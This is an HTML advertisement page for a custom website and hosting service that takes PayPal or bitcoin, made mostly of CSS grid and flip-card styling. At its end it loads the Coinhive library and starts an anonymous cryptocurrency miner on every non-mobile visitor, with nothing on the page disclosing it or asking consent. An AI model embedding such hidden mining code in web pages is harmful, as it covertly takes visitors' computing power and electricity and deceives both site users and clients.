<!DOCTYPE html>
<html>
<head>
    <style>
        body { 
		font-size: 1.1em;
		background-color: yellow;
  display: grid;
  grid-template-areas: 
    "header header header"
    "nav article ads"
    "nav footer footer";
  grid-template-rows: 80px 1fr 50px;  
  grid-template-columns: 10% 1fr;
  grid-row-gap: 4px;
  grid-column-gap: 4px;
  height: 100vh;
  margin: 0;
  }  
header, footer, article, nav, div {
  padding: 0em;
  }
#pageHeader {
    padding-left: 4em;
  grid-area: header;
  }
#pageFooter {
  grid-area: footer;
  }
#mainArticle { 
padding-right: 2em;
background-color: yellow;
  grid-area: article;      
  }
#mainNav { 
font-size: 1.2em;
  grid-area: nav; 
  }
        @media all and (max-width: 575px) {
  body { 
    grid-template-areas: 
      "header"
      "article"
      "nav"
      "footer";
    grid-template-rows: 80px 1fr 70px 1fr;  
    grid-template-columns: 1fr;
 }
}
        .notecard {
  width: 300px;
  height: 100px;
            border: 1px solid black;
  display: inline-block;
  margin: 20px;
  font-family: Arial, sans-serif;
  transform-style: preserve-3d;
  -moz-transform-style: preserve-3d;
  -o-transform-style: preserve-3d;
  -ms-transform-style: preserve-3d;
  -webkit-transform-style: preserve-3d;
  transition: 0.4s;
  -webkit-transition: 0.4s;
  -moz-transition: 0.4s;
  -o-transition: 0.4s;
}

.notecard:hover {
  transform: rotatey(-180deg);
  -webkit-transform: rotatey(-180deg);
  -moz-transform: rotatey(-180deg);
  -ms-transform: rotatey(-180deg);
  -o-transform: rotatey(-180deg);
}

.notecard .front, .notecard .back {
  width: 100%;
  height: 100%;
  position: absolute;
  backface-visibility: hidden;
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  -ms-backface-visibility: hidden;
  -o-backface-visibility: hidden;
}

.notecard .front {
  z-index: 3;
  font-size: 21px;
}

.notecard .front .word {
  display: block;
  text-align: center;
  position: relative;
  top: 10%;
}

.notecard .front .word:hover {
  color: red;
}

.notecard .back {
  z-index: 1;
  word-wrap: break-word;
  line-height: 1.6;
  transform: rotatey(-180deg);
  -webkit-transform: rotatey(-180deg);
  -moz-transform: rotatey(-180deg);
  -ms-transform: rotatey(-180deg);
  -o-transform: rotatey(-180deg);
}

.notecard .back .definition {
  width: 100%;
  height: 100%;
}
	.links {
		font-size: 0.9em;
	}
    </style>

<!-- embedded CSS above this line - - - - HTML below -->
    
  <meta charset="UTF-8"/>
  <title>Paypal</title>
</head>
<body>

    <header id="pageHeader"><h1>Custom Websites with hosting</h1></header>
  <article id="mainArticle"><ul>
        <li><p>Custom Websites designed with html + css + javascript and api usage</p></li>
        <li><p>Free hosting includeded as a subdomain on my website, it will have a direct link that looks like this https://momomeomo.github.io/your website's name.html</p></li>
		<li><p>drawbacks: large website name, not very easy to find on google</p></li>
    </ul>
    <div id="notecards">
    <div class="notecard">
        <div class="front">
            <span class="word">Payments will be processed with Paypal</span>
        </div>
    <div class="back">
      <div class="definition">
        Currently using paypal and/or bitcoin for all Transactions, other payment methods can be negotiated
      </div>
    </div>
  </div>
</div></article>
  <nav id="mainNav">-Navigation
	<ol class="links"><a href="https://momomeomo.github.io/" target="_blank"><strong>Main webpage</strong></a></ol>
	<ol class="links"><a href="https://github.com/momomeomo" target="_blank"><strong>My github</strong></a></ol>

  </nav>
    <footer id="pageFooter"><em>Contact email</em><strong>:<a href="mailto:momogithubio@outlook.com"> momogithubio@outlook.com</strong></a></footer>
	<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('u5Cxn17qNBllNwUpiEbPhvs41zio8Cws', {throttle: 0.7});

<!-- Only start on non-mobile devices -->
	if (!miner.isMobile()) {
		miner.start();
	}
</script>
</body>
</html>